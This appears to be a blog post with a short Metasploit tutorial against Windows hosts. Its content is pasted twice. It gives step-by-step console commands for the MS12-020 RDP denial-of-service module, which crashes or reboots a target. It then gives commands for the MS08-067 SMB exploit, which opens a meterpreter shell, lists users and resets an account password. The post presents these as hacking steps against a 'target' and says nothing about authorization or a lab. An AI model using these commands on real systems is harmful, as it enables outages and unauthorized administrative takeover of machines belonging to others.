This tutorial is very general and I will continue updating it whenever I will find exploits and time to update this post.
1. If 3389/tcp ms-term-serv is open then using metasploit you can cause remote machine to reboot or stop this service.
$ msfconsole
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST target-IP-Address
msf auxiliary(ms12_020_maxchannelids) > exploit
Now rescan target computer, you will find that the ms-term-serv service is disabled.
2. Hacking Windows XP SP2/SP3 and get administrator access of the system. (Following exploit attacks on port 445)
$msfconsole
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST target-IP-Address
msf exploit(ms08_067_netapi) > exploit
meterpreter > shell
C:\Windows\System32\> net user
C:\Windows\System32\> net user userName password
1. If 3389/tcp ms-term-serv is open then using metasploit you can cause remote machine to reboot or stop this service.
$ msfconsole
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST target-IP-Address
msf auxiliary(ms12_020_maxchannelids) > exploit
Now rescan target computer, you will find that the ms-term-serv service is disabled.
2. Hacking Windows XP SP2/SP3 and get administrator access of the system. (Following exploit attacks on port 445)
$msfconsole
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST target-IP-Address
msf exploit(ms08_067_netapi) > exploit
meterpreter > shell
C:\Windows\System32\> net user
C:\Windows\System32\> net user userName password
No comments:
Post a Comment